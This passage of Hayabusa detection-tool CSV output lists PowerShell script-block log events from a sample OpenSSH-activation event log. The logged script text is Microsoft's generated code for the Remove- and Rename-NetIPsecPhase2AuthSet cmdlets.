[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')]",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.561 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase2AuthSet' -Alias '*' function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) 
$__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQ",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.561 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
$script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 
($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase2AuthSet' -Alias '*' function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] 
[string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and 
